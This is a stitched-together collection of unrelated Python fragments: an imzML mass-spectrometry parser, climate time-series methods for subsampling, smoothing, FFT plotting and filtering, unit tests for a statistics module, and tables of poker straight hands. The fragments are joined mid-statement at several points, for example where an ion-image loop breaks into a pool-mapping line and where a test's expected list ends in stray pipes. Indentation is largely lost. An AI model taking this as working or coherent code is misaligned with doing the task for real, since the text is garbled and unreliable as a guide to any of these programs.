)
self.root = None
LOGGER.debug(f"Initialized parser in {format_time(time.time()-t_start)}")
@staticmethod
def _infer_bin_filename(imzml_path):
imzml_path = Path(imzml_path)
ibd_path = [
f
for f in imzml_path.parent.glob("*")
if re.match(r".+\.ibd", str(f), re.IGNORECASE) and f.stem == imzml_path.stem
][0]
return str(ibd_path)
def __iter_read_spectrum_meta(self):
"""
This method should only be called by __init__. Reads the data formats, coordinates and offsets from
the .imzML file and initializes the respective attributes. While traversing the XML tree, the per-spectrum
metadata is pruned, i.e. the <spectrumList> element(s) are left behind empty.
Supported accession values for the number formats: "MS:1000521", "MS:1000523", "IMS:1000141" or
"IMS:1000142". The string values are "32-bit float", "64-bit float", "32-bit integer", "64-bit integer".
"""
mz_group = int_group = None
# get iterator
iterparse = choose_iterparse(self._parse_lib)
elem_iterator = iterparse(self.filename, events=("start", "end"))
slist = None
_, self.root = next(elem_iterator)
for event, elem in elem_iterator:
if elem.tag == self.sl + "spectrumList" and event == "start":
slist = elem
elif elem.tag == self.sl + "spectrum" and event == "end":
self.__process_spectrum(elem)
slist.remove(elem)
elif elem.tag == self.sl + "referenceableParamGroup" and event == "end":
for param in elem:
if param.attrib["name"] == "m/z array":
self.mzGroupId = elem.attrib["id"]
mz_group = elem
elif param.attrib["name"] == "intensity array":
self.intGroupId = elem.attrib["id"]
int_group = elem
# cleanup
self.__assign_precision(int_group, mz_group)
self.__fix_offsets()
LOGGER.debug("Setup metadata")
def __fix_offsets(self):
"""Fix errors introduced by incorrect signed 32bit integers when unsigned 64bit was appropriate"""
def fix(array):
fixed = []
delta = 0
prev_value = float("nan")
for value in array:
if value < 0 <= prev_value:
delta += 2 ** 32
fixed.append(value + delta)
prev_value = value
return fixed
self.mzOffsets = fix(self.mzOffsets)
self.intensityOffsets = fix(self.intensityOffsets)
LOGGER.debug("Fixed offsets")
def __assign_precision(self, int_group, mz_group):
valid_accession_strings = (
"MS:1000521",
"MS:1000523",
"IMS:1000141",
"IMS:1000142",
"MS:1000519",
"MS:1000522",
)
mz_precision = int_precision = None
for s in valid_accession_strings:
param = mz_group.find('%scvParam[@accession="%s"]' % (self.sl, s))
if param is not None:
mz_precision = self.precisionDict[param.attrib["name"]]
break
for s in valid_accession_strings:
param = int_group.find('%scvParam[@accession="%s"]' % (self.sl, s))
if param is not None:
int_precision = self.precisionDict[param.attrib["name"]]
break
if (mz_precision is None) or (int_precision is None):
raise RuntimeError("Unsupported number format: mz = %s, int = %s" % (mz_precision, int_precision))
self.mzPrecision, self.intensityPrecision = mz_precision, int_precision
LOGGER.debug("Setup precision")
def __process_spectrum(self, elem):
array_list_item = elem.find("%sbinaryDataArrayList" % self.sl)
element_list = list(array_list_item)
element_list_sorted = [None, None]
for element in element_list:
ref = element.find("%sreferenceableParamGroupRef" % self.sl).attrib["ref"]
if ref == self.mzGroupId:
element_list_sorted[0] = element
elif ref == self.intGroupId:
element_list_sorted[1] = element
mz_offset_elem = element_list_sorted[0].find('%scvParam[@accession="IMS:1000102"]' % self.sl)
self.mzOffsets.append(int(mz_offset_elem.attrib["value"]))
mz_length_elem = element_list_sorted[0].find('%scvParam[@accession="IMS:1000103"]' % self.sl)
self.mzLengths.append(int(mz_length_elem.attrib["value"]))
intensity_offset_elem = element_list_sorted[1].find('%scvParam[@accession="IMS:1000102"]' % self.sl)
self.intensityOffsets.append(int(intensity_offset_elem.attrib["value"]))
intensity_length_elem = element_list_sorted[1].find('%scvParam[@accession="IMS:1000103"]' % self.sl)
self.intensityLengths.append(int(intensity_length_elem.attrib["value"]))
try:
tic = elem.find('%scvParam[@accession="MS:1000285"]' % self.sl).attrib["value"]
self.ticArray.append(float(tic))
except AttributeError:
pass
scan_elem = elem.find("%sscanList/%sscan" % (self.sl, self.sl))
x = scan_elem.find('%scvParam[@accession="IMS:1000050"]' % self.sl).attrib["value"]
y = scan_elem.find('%scvParam[@accession="IMS:1000051"]' % self.sl).attrib["value"]
try:
z = scan_elem.find('%scvParam[@accession="IMS:1000052"]' % self.sl).attrib["value"]
self.coordinates.append((int(x), int(y), int(z)))
except AttributeError:
self.coordinates.append((int(x), int(y), 1))
def __read_imzml_metadata(self):
"""
This method should only be called by __init__. Initializes the imzmldict with frequently used metadata from
the .imzML file.
This method reads only a subset of the available meta information and may be extended in the future. The keys
are named similarly to the imzML names. Currently supported keys: "max dimension x", "max dimension y",
"pixel size x", "pixel size y", "matrix solution concentration", "wavelength", "focus diameter x",
"focus diameter y", "pulse energy", "pulse duration", "attenuation".
If a key is not found in the XML tree, it will not be in the dict either.
:return d:
dict containing above mentioned meta data
:rtype:
dict
:raises Warning:
if an xml attribute has a number format different from the imzML specification
"""
def _check_meta(param, accession, elem_list):
for idx, _ in enumerate(param):
acc, attr = accession[idx]
elem = elem_list.find('.//%scvParam[@accession="%s"]' % (self.sl, acc))
if elem is None:
break
name, T = param[idx]
try:
metadata_dict[name] = T(elem.attrib[attr])
except ValueError:
warn(Warning('Wrong data type in XML file. Skipped attribute "%s"' % name))
metadata_dict = {}
scan_settings_list_elem = self.root.find("%sscanSettingsList" % self.sl)
instrument_config_list_elem = self.root.find("%sinstrumentConfigurationList" % self.sl)
supported_params_1 = [
("max count of pixels x", int),
("max count of pixels y", int),
("max dimension x", int),
("max dimension y", int),
("pixel size x", float),
("pixel size y", float),
("matrix solution concentration", float),
]
supported_params_2 = [
("wavelength", float),
("focus diameter x", float),
("focus diameter y", float),
("pulse energy", float),
("pulse duration", float),
("attenuation", float),
]
supported_accession_1 = [
("IMS:1000042", "value"),
("IMS:1000043", "value"),
("IMS:1000044", "value"),
("IMS:1000045", "value"),
("IMS:1000046", "value"),
("IMS:1000047", "value"),
("MS:1000835", "value"),
]
supported_accession_2 = [
("MS:1000843", "value"),
("MS:1000844", "value"),
("MS:1000845", "value"),
("MS:1000846", "value"),
("MS:1000847", "value"),
("MS:1000848", "value"),
]
_check_meta(supported_params_1, supported_accession_1, scan_settings_list_elem)
_check_meta(supported_params_2, supported_accession_2, instrument_config_list_elem)
return metadata_dict
def get_ion_image(p, mz_value, tol=0.1, z=1, reduce_func=sum):
"""Get an image representation of the intensity distribution of the ion with specified m/z value.
By default, the intensity values within the tolerance region are summed.
:param p:
the ImzMLParser (or anything else with similar attributes) for the desired dataset
:param mz_value:
m/z value for which the ion image shall be returned
:param tol:
Absolute tolerance for the m/z value, such that all ions with values
mz_value-|tol| <= x <= mz_value+|tol| are included. Defaults to 0.1
:param z:
z Value if spectrogram is 3-dimensional.
:param reduce_func:
the behaviour for reducing the intensities between mz_value-|tol| and mz_value+|tol| to a single value. Must
be a function that takes a sequence as input and outputs a number. By default, the values are summed.
:return:
numpy matrix with each element representing the ion intensity in this
pixel. Can be easily plotted with matplotlib
"""
tol = abs(tol)
im = np.zeros((p.imzmldict["max count of pixels y"], p.imzmldict["max count of pixels x"]))
for i, (x, y, z_) in enumerate(p.coordinates):
if z_ == 0:
UserWarning("z coordinate = 0 present, if you're getting blank images set getionimage(.., .., z=0)")
if z_ == z:
mzs, ints = map(lambda x: np.asarray(x), p.get_spectrum(i))
min_i, max_i = bisect_spectrum(mzs, mz_value, tol)
im[y - 1, x - 1] = reduce_func(ints[min_i : max_i + 1])
return im
# keep alias to previously named functions
getionimage = get_ion_image
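# Illustrative usage sketch (not part of the original module). The m/z and
# tolerance below are placeholder demonstration values; `parser` can be any
# object with the attributes get_ion_image expects (.imzmldict, .coordinates,
# .get_spectrum), such as the parser class defined above.
def _example_ion_image(parser, mz=885.55, tol=0.25):
    # sum the intensities within +/- tol of the requested m/z for every pixel
    return get_ion_image(parser, mz_value=mz, tol=tol, z=1, reduce_func=sum)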
def reshape_image(array, coordinates, shape) -> np.ndarray:
"""Reshape image according to the coordinates"""
assert len(array) == len(coordinates), "Input array has different size/shape than the coordinate list"
im = np.zeros(shape)
for (value, (x, y, z_)) in zip(array, coordinates):
im[y - 1, x - 1] = value
return im
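# Illustrative sketch (not part of the original module): reshape a flat list of
# per-pixel values back onto a 2 x 2 grid using 1-based (x, y, z) coordinates.
def _example_reshape_image():
    values = [10, 20, 30, 40]
    coords = [(1, 1, 1), (2, 1, 1), (1, 2, 1), (2, 2, 1)]
    return reshape_image(values, coords, shape=(2, 2))  # [[10, 20], [30, 40]]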
def _get_ion_image(p, mz_value, tol, z, reduce_func, coordinates, start_idx):
"""Utility method used by multi-core/thread image reader"""
tol = abs(tol)
im = np.zeros((p.imzmldict["max count of pixels y"], p.imzmldict["max count of pixels x"]))
for i, (x, y, z_) in enumerate(coordinates, start=start_idx):
if z_ == 0:
UserWarning("z coordinate = 0 present, if you're getting blank images set getionimage(.., .., z=0)")
if z_ == z:
mzs, ints = map(lambda x: np.asarray(x), p.get_spectrum(i))
                min_i, max_i = bisect_spectrum(mzs, mz_value, tol)
        job_result = pool.map(self._interp_temporal, job_args)
del job_args
for i, j, res in job_result:
interp_data[:, i, j] = res
interp_data = np.squeeze(interp_data)
self.data = np.squeeze(self.data)
if use_to_data:
self.time = new_time.copy()
self.data = interp_data.copy()
else:
return interp_data, new_time
def _ascending_descending_lat_lons(self, lats = True, lons = False, direction = 'asc'):
"""
Transforms the data (and lats and lons) so that they have strictly ascending (direction = 'asc')
or descending (direction = 'des') order. (Needed for interpolation).
Returns True if manipulation took place.
"""
lat_flg, lon_flg = False, False
if np.all(np.diff(self.lats) < 0) and lats and direction == 'asc':
self.lats = self.lats[::-1]
self.data = self.data[..., ::-1, :]
lat_flg = True
elif np.all(np.diff(self.lats) > 0) and lats and direction == 'des':
self.lats = self.lats[::-1]
self.data = self.data[..., ::-1, :]
lat_flg = True
if np.all(np.diff(self.lons) < 0) and lons and direction == 'asc':
self.lons = self.lons[::-1]
self.data = self.data[..., ::-1]
lon_flg = True
elif np.all(np.diff(self.lons) > 0) and lons and direction == 'des':
self.lons = self.lons[::-1]
self.data = self.data[..., ::-1]
lon_flg = True
return lat_flg, lon_flg
def subsample_spatial(self, lat_to, lon_to, start, average = False):
"""
        Subsamples the data in the spatial sense to grid "lat_to" x "lon_to" in degrees.
Start is starting point for subsampling in degrees as [lat, lon]
        If average is True, the subsampling is done by averaging the data -- using SciPy's spline
interpolation on the rectangle. The interpolation is done for each time step and level
independently.
If average is False, the subsampling is just subsampling certain values.
"""
if self.lats is not None and self.lons is not None:
delta_lats = np.abs(self.lats[1] - self.lats[0])
delta_lons = np.abs(self.lons[1] - self.lons[0])
if lat_to % delta_lats == 0 and lon_to % delta_lons == 0:
lat_ndx = int(lat_to // delta_lats)
lon_ndx = int(lon_to // delta_lons)
lat_flg, lon_flg = self._ascending_descending_lat_lons(lats = True, lons = True, direction = 'asc')
start_lat_ndx = np.where(self.lats == start[0])[0]
start_lon_ndx = np.where(self.lons == start[1])[0]
if start_lon_ndx.size == 1 and start_lat_ndx.size == 1:
start_lat_ndx = start_lat_ndx[0]
start_lon_ndx = start_lon_ndx[0]
if not average:
self.lats = self.lats[start_lat_ndx::lat_ndx]
self.lons = self.lons[start_lon_ndx::lon_ndx]
d = self.data
d = d[..., start_lat_ndx::lat_ndx, :]
self.data = d[..., start_lon_ndx::lon_ndx]
else:
nan_flag = False
if self.nans:
if self.check_NaNs_only_spatial():
# for interpolation purposes, fill NaNs with 0.
msk = np.isnan(self.data)
self.data[msk] = 0.
msk = msk[0, ...]
nan_flag = True
else:
raise Exception("NaNs in the data are not only spatial, cannot interpolate!")
from scipy.interpolate import RectBivariateSpline
# if data is single-level - create additional dummy dimension
if self.data.ndim == 3:
self.data = self.data[:, np.newaxis, :, :]
# fields for new lats / lons
new_lats = np.arange(start[0], self.lats[-1]+lat_to, lat_to)
new_lons = np.arange(start[1], self.lons[-1], lon_to)
d = np.zeros((list(self.data.shape[:2]) + [new_lats.shape[0], new_lons.shape[0]]))
# interpolate using Bivariate spline
for t in range(self.time.shape[0]):
for lvl in range(self.data.shape[1]):
int_scheme = RectBivariateSpline(self.lats, self.lons, self.data[t, lvl, ...])
d[t, lvl, ...] = int_scheme(new_lats, new_lons)
if nan_flag:
# subsample mask to new grid
msk_temp = msk[start_lat_ndx::lat_ndx, :]
msk = msk_temp[..., start_lon_ndx::lon_ndx]
# return back NaNs
for t in range(self.time.shape[0]):
for lvl in range(self.data.shape[1]):
d[t, lvl, msk] = np.nan
self.lats = new_lats
self.lons = new_lons
self.data = np.squeeze(d)
if np.any(np.isnan(self.data)):
self.nans = True
else:
self.nans = False
else:
raise Exception("Start lat and / or lon for subsampling does not exist in the data!")
self._ascending_descending_lat_lons(lats = lat_flg, lons = lon_flg, direction = 'des')
else:
raise Exception("Subsampling lats only to multiples of %.2f and lons of %.2f" % (delta_lats, delta_lons))
else:
raise Exception("Cannot subsample station data, or data from one grid point!")
def smoothing_running_avg(self, points, cut_edges = False, use_to_data = False, ts = None):
"""
Smoothing of time series using running average over points.
If use_to_data is False, returns the data, otherwise rewrites the data in class.
"""
        ts_was_none = ts is None  # remember whether we are smoothing self.data itself
        if ts_was_none:
            ts = self.data.copy()
if cut_edges:
d = np.zeros(([ts.shape[0] - points + 1] + list(ts.shape[1:])))
else:
d = np.zeros_like(ts)
window = points//2
for i in range(d.shape[0]):
if cut_edges:
d[i, ...] = np.nanmean(ts[i : i+points, ...], axis = 0)
else:
d[i, ...] = np.nanmean(ts[max(i-window,1) : min(i+window,d.shape[0]), ...], axis = 0)
        if use_to_data and ts_was_none:
self.data = d.copy()
if cut_edges:
if points % 2 == 1:
# time slicing when points is odd -- cut points//2 from the beginning and from the end
self.time = self.time[points//2 : -points//2 + 1]
else:
# time slicing when points is even -- not sure where to cut
pass
else:
return d
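    # Minimal standalone sketch (added for illustration, not from the original
    # class) of the cut_edges=True branch above for a plain 1D array:
    #
    #   ts = np.arange(10, dtype=float)
    #   smooth = np.array([ts[i:i + 3].mean() for i in range(len(ts) - 3 + 1)])
    #
    # i.e. a running mean over `points` samples that drops the edge samples.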
def plot_FFT_spectrum(self, ts = None, log = True, vlines = np.arange(1,11), fname = None):
"""
        Estimates the power spectrum via an FFT amplitude spectrum (plotted in dB).
if ts is None, plots spectrum of the data.
ts should have same sampling frequency as data!
y axis is log by default, if log is True, also x axis is log.
"""
import matplotlib.pyplot as plt
delta = self.time[1] - self.time[0]
if delta == 1:
# daily time series
fs = 1./86400 # Hz
elif abs(delta - 30) < 3.0:
# monthly time series
fs = 1./2.628e+6
elif abs(delta - 365) < 2.0:
# yearly time series
fs = 1./3.154e+7
plt.figure(figsize = (15,7))
plt.gca().spines['top'].set_visible(False)
plt.gca().spines['right'].set_visible(False)
plt.gca().spines['left'].set_visible(False)
ts = ts if ts is not None else self.data.copy()
if isinstance(ts, list):
ts = np.array(ts).T
if ts.ndim > 2:
ts = ts.reshape([ts.shape[0], np.prod(ts.shape[1:])])
fft = np.abs(np.fft.rfft(ts, axis = 0))
freqs = np.fft.rfftfreq(ts.shape[0], d = 1./fs)
freqs *= 3.154e+7
if log:
plt.semilogx(freqs, 20*np.log10(fft), linewidth = 0.8) # in dB hopefully...
plt.xlabel('FREQUENCY [log 1/year]', size = 25)
else:
plt.plot(freqs, 20*np.log10(fft), linewidth = 0.8)
plt.xlabel('FREQUENCY [1/year]', size = 25)
for vline in vlines:
plt.axvline(1./vline, 0, 1, linestyle = ':',linewidth = 0.6, color = "#333333")
plt.xlim([freqs[0], freqs[-1]])
plt.ylabel('FFT SPECTRUM [dB]', size = 25)
if fname is None:
plt.show()
else:
plt.savefig(fname, bbox_inches = 'tight')
def temporal_filter(self, cutoff, btype, ftype = 'butter', order = 2, cut = 1, pool = None, cut_time = False,
rp = None, rs = None, cut_data = False):
"""
Filters data in temporal sense.
        Uses an IIR filter (Butterworth by default, selectable via `ftype`) of the given order.
btype:
lowpass
highpass
bandpass
bandstop
cutoff:
for low/high pass one frequency in months
for band* list of frequencies in months
ftype:
butter - for Butterworth filter
cheby1 - for Chebyshev type I filter
cheby2 - for Chebyshev type II filter
ellip - for Cauer/elliptic filter
bessel - for Bessel/Thomson filter
cut in years
"""
from scipy.signal import iirfilter
delta = self.time[1] - self.time[0]
if delta == 1:
# daily time series
fs = 1./86400 # Hz
y = 365.25
elif abs(delta - 30) < 3.0:
# monthly time series
fs = 1./2.628e+6 # Hz
y = 12
nyq = 0.5 * fs # Nyquist frequency
if 'cheby' in ftype or 'ellip' == ftype:
rp = rp if rp is not None else 60
if type(cutoff) == list and btype in ['bandpass', 'bandstop']:
low = cutoff[0] if cutoff[0] > cutoff[1] else cutoff[1]
high = cutoff[1] if cutoff[0] > cutoff[1] else cutoff[0]
low = 1./(low*2.628e+6) # in months
high = 1./(high*2.628e+6)
# get coefficients
b, a = iirfilter(order, [low/nyq, high/nyq], rp = rp, rs = rs, btype = btype, analog = False, ftype = ftype)
elif btype in ['lowpass', 'highpass']:
cutoff = 1./(cutoff*2.628e+6)
b, a = iirfilter(order, cutoff/nyq, rp = rp, rs = rs, btype = btype, analog = False, ftype = ftype)
else:
raise Exception("For band filter cutoff must be a list of [low,high] for low/high-pass cutoff must be a integer!")
if pool is None:
map_func = map
elif pool is not None:
map_func = pool.map
if self.data.ndim > 1:
num_lats = self.lats.shape[0]
num_lons = self.lons.shape[0]
else:
num_lats = 1
num_lons = 1
self.data = self.data[:, np.newaxis, np.newaxis]
self.filtered_data = np.zeros_like(self.data)
job_args = [ (i, j, self.data[:, i, j], b, a) for i in range(num_lats) for j in range(num_lons) ]
job_result = map_func(self._get_filtered_data, job_args)
del job_args
for i, j, res in job_result:
self.filtered_data[:, i, j] = res
del job_result
if cut is not None:
to_cut = int(y*cut)
if cut_time:
self.time = self.time[to_cut:-to_cut]
if cut_data:
                self.data = self.data[to_cut:-to_cut, ...]
[3.3, 5.5, 6.6], [1e23, 2e23, 1e24]):
assert len(data) == 3
_ = self.func(data)
def testInPlaceModification(self):
# Test that the function does not modify its input data.
data = [3, 0, 5, 1, 7, 2]
# We wish to detect functions that modify the data in place by
# sorting, which we can't do if the data is already sorted.
assert data != sorted(data)
saved = data[:]
assert data is not saved
_ = self.func(data)
self.assertEqual(data, saved, "data has been modified")
def testOrderOfDataPoints(self):
# Test that the result of the function shouldn't depend on the
# order of data points. In practice, due to floating point
# rounding, it may depend slightly.
data = [1, 2, 2, 3, 4, 7, 9]
expected = self.func(data)
result = self.func(data[::-1])
self.assertApproxEqual(expected, result)
for i in range(10):
random.shuffle(data)
result = self.func(data)
self.assertApproxEqual(result, expected)
def get_allowed_kinds(self):
class MyList(list):
pass
class MyTuple(tuple):
pass
def generator(data):
return (obj for obj in data)
return (list, tuple, iter, MyList, MyTuple, generator)
def testTypeOfDataCollection(self):
        # Test that the type of iterable data doesn't affect the result.
data = range(1, 16, 2)
expected = self.func(data)
for kind in self.get_allowed_kinds():
result = self.func(kind(data))
self.assertEqual(result, expected)
def testFloatTypes(self):
        # Test that the type of float shouldn't affect the result.
class MyFloat(float):
def __add__(self, other):
return MyFloat(super().__add__(other))
__radd__ = __add__
def __mul__(self, other):
return MyFloat(super().__mul__(other))
__rmul__ = __mul__
data = [2.5, 5.5, 0.25, 1.0, 2.25, 7.0, 7.25]
expected = self.func(data)
data = [MyFloat(x) for x in data]
result = self.func(data)
self.assertEqual(result, expected)
# FIXME: needs tests for bad argument types.
class SumTest(NumericTestCase, UnivariateMixin):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.func = calcstats.sum
def testEmptyData(self):
# Override UnivariateMixin method.
for empty in ([], (), iter([])):
self.assertEqual(self.func(empty), 0)
for start in (Fraction(23, 42), Decimal('3.456'), 123.456):
self.assertEqual(self.func(empty, start), start)
def testCompareWithFSum(self):
# Compare with the math.fsum function.
data = [random.uniform(-500, 5000) for _ in range(1000)]
actual = self.func(data)
expected = math.fsum(data)
self.assertApproxEqual(actual, expected, rel=1e-15)
def testExactSeries(self):
# Compare with exact formulae for certain sums of integers.
# sum of 1, 2, 3, ... n = n(n+1)/2
data = list(range(1, 131))
random.shuffle(data)
expected = 130*131/2
self.assertEqual(self.func(data), expected)
# sum of squares of 1, 2, 3, ... n = n(n+1)(2n+1)/6
data = [n**2 for n in range(1, 57)]
random.shuffle(data)
expected = 56*57*(2*56+1)/6
self.assertEqual(self.func(data), expected)
# sum of cubes of 1, 2, 3, ... n = n**2(n+1)**2/4 = (1+2+...+n)**2
data1 = list(range(1, 85))
random.shuffle(data1)
data2 = [n**3 for n in data1]
random.shuffle(data2)
expected = (84**2*85**2)/4
self.assertEqual(self.func(data1)**2, expected)
self.assertEqual(self.func(data2), expected)
def testStartArgument(self):
# Test that the optional start argument works correctly.
data = [random.uniform(1, 1000) for _ in range(100)]
t = self.func(data)
for start in (42, -23, 1e20):
self.assertEqual(self.func(data, start), t+start)
def testFractionSum(self):
F = Fraction
# Same denominator (or int).
data = [F(3, 5), 1, F(4, 5), -F(7, 5), F(9, 5)]
start = F(1, 5)
expected = F(3, 1)
self.assertEqual(self.func(data, start), expected)
# Different denominators.
data = [F(9, 4), F(3, 7), 2, -F(2, 5), F(1, 3)]
start = F(1, 2)
expected = F(2147, 420)
self.assertEqual(self.func(data, start), expected)
def testDecimalSum(self):
D = Decimal
data = [D('0.7'), 3, -D('4.3'), D('2.9'), D('3.6')]
start = D('1.5')
expected = D('7.4')
self.assertEqual(self.func(data, start), expected)
def testFloatSubclass(self):
class MyFloat(float):
def __add__(self, other):
return MyFloat(super().__add__(other))
__radd__ = __add__
data = [1.25, 2.5, 7.25, 1.0, 0.0, 3.5, -4.5, 2.25]
data = map(MyFloat, data)
expected = MyFloat(13.25)
actual = self.func(data)
self.assertEqual(actual, expected)
self.assertTrue(isinstance(actual, MyFloat))
def testFloatSum(self):
data = [2.77, 4.23, 1.91, 0.35, 4.01, 0.57, -4.15, 8.62]
self.assertEqual(self.func(data), 18.31)
data = [2.3e19, 7.8e18, 1.0e20, 3.5e19, 7.2e19]
self.assertEqual(self.func(data), 2.378e20)
class SumTortureTest(NumericTestCase):
def testTorture(self):
# Variants on Tim Peters' torture test for sum.
func = calcstats.sum
self.assertEqual(func([1, 1e100, 1, -1e100]*10000), 20000.0)
self.assertEqual(func([1e100, 1, 1, -1e100]*10000), 20000.0)
self.assertApproxEqual(
func([1e-100, 1, 1e-100, -1]*10000), 2.0e-96, rel=1e-15, tol=0)
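# Aside (added for illustration, not part of the original test suite): the point
# of the torture data is that a naive left-to-right float sum loses the small terms:
#
#   naive = 0.0
#   for x in [1, 1e100, 1, -1e100] * 10000:
#       naive += x        # the 1s are absorbed once 1e100 enters the running sum
#   # naive == 0.0, whereas math.fsum (and calcstats.sum) recover 20000.0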
# === Test products ===
class RunningProductTest(unittest.TestCase, TestConsumerMixin):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.func = calcstats.running_product
def testProduct(self):
cr = self.func()
data = [3, 5, 1, -2, -0.5, 0.75]
expected = [3, 15, 15, -30, 15.0, 11.25]
assert len(data)==len(expected)
for x, y in zip(data, expected):
self.assertEqual(cr.send(x), y)
def testProductStart(self):
start = 1.275
cr = self.func(start)
data = [2, 5.5, -4, 1.0, -0.25, 1.25]
expected = [2, 11.0, -44.0, -44.0, 11.0, 13.75]
assert len(data)==len(expected)
for x, y in zip(data, expected):
self.assertEqual(cr.send(x), start*y)
def testFractions(self):
F = Fraction
data = [F(3, 5), 2, F(1, 4), F(5, 3)]
expected = [F(3, 5), F(6, 5), F(6, 20), F(1, 2)]
assert len(data)==len(expected)
start = F(1, 7)
rs = self.func(start)
for f, y in zip(data, expected):
x = rs.send(f)
self.assertEqual(x, start*y)
self.assertTrue(isinstance(x, Fraction))
def testDecimals(self):
D = Decimal
data = [D('0.4'), 4, D('2.5'), D('1.7')]
expected = [D('0.4'), D('1.6'), D('4.0'), D('6.8')]
assert len(data)==len(expected)
start = D('1.35')
rs = self.func(start)
for d, y in zip(data, expected):
x = rs.send(d)
self.assertEqual(x, start*y)
self.assertTrue(isinstance(x, Decimal))
class ProductTest(NumericTestCase, UnivariateMixin):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.func = calcstats.product
def testEmptyData(self):
# Override UnivariateMixin method.
for empty in ([], (), iter([])):
self.assertEqual(self.func(empty), 1)
for start in (Fraction(23, 42), Decimal('3.456'), 123.456):
self.assertEqual(self.func(empty, start), start)
def testStartArgument(self):
# Test that the optional start argument works correctly.
data = [random.uniform(-10, 10) for _ in range(100)]
t = self.func(data)
for start in (2.1, -3.7, 1e10):
self.assertApproxEqual(self.func(data, start), t*start, rel=2e-15)
def testFractionProduct(self):
F = Fraction
data = [F(9, 4), F(3, 7), 2, -F(2, 5), F(1, 3), -F(1, 3)]
start = F(1, 2)
expected = F(3, 70)
self.assertEqual(self.func(data, start), expected)
def testDecimalProduct(self):
D = Decimal
data = [D('0.5'), 8, -D('4.75'), D('2.0'), D('3.25'), -D('5.0')]
start = D('1.5')
expected = D('926.25')
self.assertEqual(self.func(data, start), expected)
def testFloatSubclass(self):
class MyFloat(float):
def __mul__(self, other):
return MyFloat(super().__mul__(other))
__rmul__ = __mul__
data = [2.5, 4.25, -1.0, 3.5, -0.5, 0.25]
data = map(MyFloat, data)
expected = MyFloat(4.6484375)
actual = self.func(data)
self.assertEqual(actual, expected)
self.assertTrue(isinstance(actual, MyFloat))
def testFloatProduct(self):
data = [0.71, 4.10, 0.18, 2.47, 3.11, 0.79, 1.52, 2.31]
        expected = 11.1648967698 # Calculated with HP-48GX.
        self.assertApproxEqual(self.func(data), expected, tol=1e-10)
data = [2, 3, 5, 10, 0.25, 0.5, 2.5, 1.5, 4, 0.2]
self.assertEqual(self.func(data), 112.5)
# === Test means ===
class RunningMeanTest(unittest.TestCase, TestConsumerMixin):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.func = calcstats.running_mean
def testFloats(self):
cr = self.func()
data = [3, 5, 0, -1, 0.5, 1.75]
expected = [3, 4.0, 8/3, 1.75, 1.5, 9.25/6]
assert len(data)==len(expected)
for x, y in zip(data, expected):
self.assertEqual(cr.send(x), y)
def testFractions(self):
F = Fraction
data = [F(3, 5), F(1, 5), F(1, 3), 3, F(5, 3)]
expected = [F(3, 5), F(2, 5), F(17, 45), F(31, 30), F(29, 25)]
assert len(data)==len(expected)
rs = self.func()
for f, y in zip(data, expected):
x = rs.send(f)
self.assertEqual(x, y)
self.assertTrue(isinstance(x, Fraction))
def testDecimals(self):
D = Decimal
data = [D('3.4'), 2, D('3.9'), -D('1.3'), D('4.2')]
expected = [D('3.4'), D('2.7'), D('3.1'), D('2.0'), D('2.44')]
assert len(data)==len(expected)
rs = self.func()
for d, y in zip(data, expected):
x = rs.send(d)
self.assertEqual(x, y)
self.assertTrue(isinstance(x, Decimal))
class MeanTest(NumericTestCase, UnivariateMixin):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.func = calcstats.mean
self.data = [1.1, 2.2, 3.3, 4.4, 5.5, 6.6, 7.7, 8.8, 9.9]
self.expected = 5.5
def setUp(self):
random.shuffle(self.data)
def testSeq(self):
self.assertApproxEqual(self.func(self.data), self.expected)
def testShiftedData(self):
# Shifting data shouldn't change the mean.
data = [x + 1e9 for x in self.data]
expected = self.expected + 1e9
assert expected != 1e9
self.assertApproxEqual(self.func(data), expected)
def testIter(self):
self.assertApproxEqual(self.func(iter(self.data)), self.expected)
def testSingleton(self):
for x in self.data:
self.assertEqual(self.func([x]), x)
def testDoubling(self):
# Average of [a,b,c...z] should be same as for [a,a,b,b,c,c...z,z].
data = [random.random() for _ in range(1000)]
a = self.func(data)
b = self.func(data*2)
self.assertApproxEqual(a, b)
def testAddMean(self):
# Adding the mean to a data set shouldn't change the mean.
data = [random.random() for _ in range(1000)]
a = self.func(data)
data.extend([a]*123)
random.shuffle(data)
b = self.func(data)
self.assertApproxEqual(a, b, tol=1e-15)
# === Test variances and standard deviations ===
class WelfordTest(NumericTestCase, TestConsumerMixin):
# Expected results were either calculated by hand, or using a HP-48GX
# calculator with the RPL program: « Σ+ PVAR NΣ * »
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.func = calcstats.welford
def testFloats(self):
cr = self.func()
data = [2.5, 3.25, 5, -0.5, 1.75, 2.5, 3.5]
expected = [0.0, | |
STRAIGHT_HHHDH.append({H[9], H[10], H[11], D[12], H[0]})

def _straights(s0, s1, s2, s3, s4):
    # All ten straights whose five card positions take their suits from the given
    # suit lists: the nine consecutive-index runs plus the wrap-around straight
    # (indices 9, 10, 11, 12, 0) that the original loops appended separately.
    hands = [{s0[i], s1[i + 1], s2[i + 2], s3[i + 3], s4[i + 4]} for i in range(9)]
    hands.append({s0[9], s1[10], s2[11], s3[12], s4[0]})
    return hands

STRAIGHT_HHHDD = _straights(H, H, H, D, D)
STRAIGHT_HHDSS = _straights(H, H, D, S, S)
STRAIGHT_HHDSC = _straights(H, H, D, S, C)
STRAIGHT_HHDSH = _straights(H, H, D, S, H)
STRAIGHT_HHDSD = _straights(H, H, D, S, D)
STRAIGHT_HHDCS = _straights(H, H, D, C, S)
STRAIGHT_HHDCC = _straights(H, H, D, C, C)
STRAIGHT_HHDCH = _straights(H, H, D, C, H)
STRAIGHT_HHDCD = _straights(H, H, D, C, D)
STRAIGHT_HHDHS = _straights(H, H, D, H, S)
STRAIGHT_HHDHC = _straights(H, H, D, H, C)
STRAIGHT_HHDHH = _straights(H, H, D, H, H)
STRAIGHT_HHDHD = _straights(H, H, D, H, D)
STRAIGHT_HHDDS = _straights(H, H, D, D, S)
STRAIGHT_HHDDC = _straights(H, H, D, D, C)
STRAIGHT_HHDDH = _straights(H, H, D, D, H)
STRAIGHT_HHDDD = _straights(H, H, D, D, D)
STRAIGHT_HDSSS = _straights(H, D, S, S, S)
STRAIGHT_HDSSC = _straights(H, D, S, S, C)
STRAIGHT_HDSSH = _straights(H, D, S, S, H)
